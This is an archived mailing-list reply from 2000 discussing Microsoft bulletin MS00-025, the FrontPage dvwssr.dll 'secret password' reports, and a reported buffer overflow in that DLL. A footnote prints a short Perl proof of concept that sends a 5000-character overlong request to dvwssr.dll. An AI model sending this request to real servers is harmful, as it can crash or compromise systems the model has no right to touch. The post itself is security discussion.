Re: MS secret password

by "Harold A. Driscoll" <harold(at)driscoll.chi.il.us>

 Date:  Fri, 14 Apr 2000 21:52:52 -0500
 To:  John.ksi(at)webplus.net
 Cc:  hwg-servers(at)hwg.org
 In-Reply-To:  webplus
  todo: View Thread, Original
At 06:09 14-04-00 , John.ksi(at)webplus.net wrote:
>>From today's Wall Street Journal:
>
>"Microsoft's engineers included in some of its Internet
>software a secret password that could be used to access
>thousands of Web sites."

Microsoft now has released security bulletin MS00-025 which assures us that
"Press reports have claimed that there is a password involved in this
vulnerability, but this is not correct. The component uses an obfuscation
key, but it is unrelated to the vulnerability."

A revealing choice of embedded text string (read it backwards):

	"!seineew era sreenigne epacsteN"

>I'll withhold my snide remarks...   :|

That is going to be a real challenge, particularly if Microsoft's
assessment of the extent of the vulnerability proves to be as lame as a
subsequent posting to NTBugTraq would suggest.

Our list of issues seems to be growing:

	* The willingness by WSJ to go to press with part of a story, rather than
getting a full story and _then_ going to press.
	* The actual (and IMHO nontrivial) security issues addressed in MS00-025.
	* The "fireable offense" text string in the two DLL modules.
	* The lack of code review and quality assurance that allowed such code to
be released.
	* The reported Buffer Overflow security hole in that same module.
	* The apparently very lame security analysis by Microsoft, addressing only
the part of the security problem that was spoon-fed to them.
	* It is hard (for example) to imagine a serious product (FP for the DLL)
pre-release test suite without a test similar to Gerardo Richarte's [1].
	* Who knows where this story will turn next.

I'll close with a quote from Rain Forest Puppy in UMBRA Advisory RFP2K02 on
this very topic:

	"Regardless if Netscape engineers are weenies, Microsoft engineers are
definitely pompous"

Safe computing,  /Harold

=============================
[1] 
#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Harold A. Driscoll                 mailto:Harold(at)Driscoll.Chi.IL.US
#include <std/disclaimer>                 http://Driscoll.Chi.IL.US

HWG: hwg-servers mailing list archives, maintained by Webmasters @ IWA

This page is part of a preserved archive of archives.hwg.org. The site is no longer active and its content is not maintained. For enquiries about this archive, write to archive(at)iwanet.org.